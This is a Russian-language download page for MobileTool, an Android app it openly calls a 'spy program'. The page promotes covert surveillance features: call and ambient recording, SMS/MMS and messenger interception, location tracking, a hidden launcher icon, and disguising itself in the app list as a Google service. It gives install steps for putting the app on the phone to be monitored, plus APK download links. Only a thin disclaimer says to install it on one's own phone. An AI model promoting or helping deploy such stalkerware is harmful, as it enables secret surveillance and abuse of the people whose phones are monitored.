Лучшие приложения

AliExpress ShoppingShazam EncoreUC BrowserSHAREitPicsArtVivaVideo Pro

MobileTool

Опубликовано в Другое


MobileToolMobileToolMobile Tool


MobileTool - программа шпион для Андроид.
Приложение MobileTool позволяет записывать звонки, SMS, MMS, местонахождением телефона, вести запись окружения и многое другое. Доступ к данным - через сайт.
Приложение умеет:

  • Делать записи телефонных разговоров и высылать их в личный кабинет пользователя (данные хранятся на хостинге системы). 
  • Определять координаты телефона по вышкам сотовой сети, IP, WI-FI и накладывать их на карты Yandex и Google. В личном кабинете можно посмотреть схему перемещений телефона за выбранный период. Причем наличие GPS в телефоне не обязательно!
  • Перехватывать входящие и исходящие SMS-сообщения, входящие и исходящие MMS-сообщения, в том числе и MMS с прикрепленными картинками.
  • Записывать окружение телефона (незаметное включение диктофона на телефоне).
  • Позволяет управлять прослушиваемым телефоном через короткие SMS с телефона администратора.
  • Перехватывать историю встроенного web-браузера.
  • Скачивать телефонную книгу (список всех контактов).
  • Само умеет включать передачу данных (на большинстве телефонов), причем незаметно в тот момент, когда пользователь не пользуется телефоном.
  • Приложение не использует мобильный трафик в роуминге и передает данные в роуминге только через WI-FI.
  • Собирать данные при отсутствии подключения к интернету, а при его появлении - передавать данные.
  • Приложение привязывается к конкретному телефону, а не к SIM-карте, и успешно работает на телефонах с несколькими SIM-картами. 
  • Удалять свой ярлык из списка приложений.
  • Просматривать фотографии.
  • Делать снимки.
  • Скриншот экрана.
  • Осуществлять антикражные функции (блокировка аппарата, включение сирены, снимок с фронтальной камеры при разблокировке, очистка пользовательских данных).

В root-версии реализованы дополнительные возможности записи сообщений из мессенджеров, агрегаторов, почтовых программ (WhatsApp, Skype, Viber, Hangouts, Агент@mail.ru, Вконтакте, Одноклассники и т.д.)

Все данные передаются с телефона в личный кабинет пользователя. Сайт и личный кабинет имеют адаптивный дизайн. Это значит, что сайт отображается удобно и понятно на разных устройствах (компьютерах, планшетах, мобильных телефонах).

Условия использования
Первые 2 дня (с момента установки и активации приложения) – бесплатно! После двух дней пробного использования – за деньги (скидка 5-20% в зависимости от продолжительности оплачиваемого периода). Оплатить можно в личном кабинете электронными деньгами, карточкой, через платежные терминалы и множеством других способов.

Внимательно ознакомьтесь с разделом "Юридическая информация"!

Установка
Установка упрощена до минимума:

  • Регистрируетесь plugins/system/oyl/redirect.php?goto=ZgbjAQAMpjqABx1heAhkX4jZ2%2BHhWPP%2F%2Fl%2BDs%2BMygZkXkmYuX6%2FlWw%3D%3D
  • Добавляете телефон в личном кабинете. Получаете уникальный номер IDS для телефона, на котором будет работать приложение.
  • Устанавливаете приложение на телефон, который нужно контролировать (установка занимает всего 1 минуту!). Вводите в приложение свой уникальный код IDS.
  • Ура, все готово!

Рекомендации
Расход трафика приложением в среднем 120-600 мегабайт в месяц. Рекомендуем покупать пакеты предоплаченного трафика не менее 500 мегабайт, а лучше использовать пакет без лимита трафика. Предпочтительно использовать приложение на телефонах со стандартом связи UMTS (3G) или HSPA (3.5G), т.к. они имеют возможность отправить данные максимально быстро. Желательно, чтобы телефон имел внутреннюю память достаточного объема (4 Гб и более) помимо дополнительно подключаемой SDCARD с возможностью установки приложений на внутреннюю память. Желательно включить на телефоне передачу данных и не выключать ее, т.к. не на всех телефонах приложение имеет возможность включить передачу данных самостоятельно.

Демонстрация
Описание и скриншоты plugins/system/oyl/redirect.php?goto=ZgbjAQAMsKv7Qoc9kZ%2FEqm0rE1TOm2%2F%2FM%2BExFDFs0U0PqHjOO%2BHnHr%2BtJAgWclx0. Демонстрация системы: plugins/system/oyl/redirect.php?goto=ZgbjAQAMuxJO1HaTOaRzmHjiUb4e%2FJR1Z2%2F7KGlcpdKRzUq8wOaN9w%3D%3D

Вопросы по установке, настройке, некорректной работе
Продвинутая система мгновенной помощи на сайте, доступная из личного кабинета.

Юридическая информация
Приложение распространяется как есть, на бесплатной основе. Плата взымается за услуги хранения информации, собранной приложением, согласно действующим тарифам. Важно помнить, что приложение можно устанавливать только на собственный телефон. Нельзя использовать приложение для несанкционированного доступа к чужой информации. В противном случае Вы нарушаете законодательство большинства стран СНГ и вся ответственность ложится на Вас. Поскольку мы технически не можем проверить, на чужой или свой телефон устанавливается приложение, - мы надеемся на Вашу честность.

УСТАНОВКА НОВОЙ ВЕРСИИ

  • 1. Перед установкой новой версии нужно удалить старую. Для этого в менеджере приложений выберите Goo..e Dri.. Serv.. и нажмите кнопку "Удалить" (Delete). В root-версии после отработки "Спрятать" удаление производится из экрана настроек (Удалить => потребуется перезагрузка).
  • 2. Никогда не устанавливайте программу заново поверх старой. Это может привести к непредсказуемой неработоспособности программы (данные не будут заливаться на сервер и т.д.).
  • 3. Если не удается удалить из менеджера приложений, то проверьте в списке администраторов (Безопасность=>Администраторы) и снимите галку напротив него. После этого можно будет удалить приложение стандартным образом.
  • 4. Начиная с версии 21, есть возможность экстренной загрузки данных из экрана настроек (Загрузить данные), т.е. исключена потеря данных при переустановке.

Внимание! Начиная с версии 18, изменилась система команд. Теперь управление идет через сервер. После обновления смотрите подробности в меню телефона в разделе "Управление". Внимание! В Android 5+ убрали возможность программного включения мобильного интернета. Все еще продолжает работать на некоторых рутованных при установке в системную область (на экране настроек: "Спрятать") Внимание! При удалении IDS из кабинета оставшиеся дни перечисляются обратно на баланс кабинета автоматически.

Скачать приложение MobileTool (Mobile Tool) для Андроид вы можете по ссылке ниже



Разработчик: MobileTool
Платформа: Android 2.3.3 и выше
Язык интерфейса: Русский (RUS)
Состояние: Free (Бесплатно)
Root: Не обязателен




СКАЧАТЬ:
Доступ по ссылке (plugins/system/oyl/redirect.php?goto=ZgbjAQAMz%2BXkfD34V20d3GdO4P8zT%2FzWXb3QQRrGG3g%3D)MobileTool (Оф сайт)[mobiletool.ru]2016-01-21 22:56
Доступ по ссылке (plugins/system/oyl/redirect.php?goto=ZgbjAQAMOhH%2FRL%2FzN6bjgXnf0Vfjz5DVhTx49otYZtjHXDAKAGs5mpr%2FdZCROzekUxFJHtsdT0A%3D)MobileTool - v24[Размер файла - 1,01 Mb]2017-12-05 00:54
Доступ по ссылке (plugins/system/oyl/redirect.php?goto=ZgbjAQAMTzOYGLG6XMwFYsopu6nprYTrtgNDdQIRayXpy02Bb3MDJ5NkEgSQHgX9PEGGI3lp8pw%3D)MobileTool - v24 (root)[Размер файла - 1,79 Mb]2017-12-05 00:56
Доступ по ссылке (plugins/system/oyl/redirect.php?goto=ZgbjAQAMZDzvppFTgiH41rA3co565EJurNQWVlHvwGEdf%2FvmkPLXn3P1ED59XU0yqkarYiChSSw%3D)MobileTool - 25.12 (новая версия)[Размер файла - 1,24 Mb]2018-04-16 15:03
Доступ по ссылке (plugins/system/oyl/redirect.php?goto=ZgbjAQAMeWjK9qifFmNjn3umlRNC8UyHrlCyzG5kpUux5%2FtkX7tX12tBNjYcFL%2B%2FDfOFvOGg4cM%3D)MobileTool - 25.12 (root) (новая версия)[Размер файла - 2,37 Mb]2018-04-16 15:04

Поиск по сайту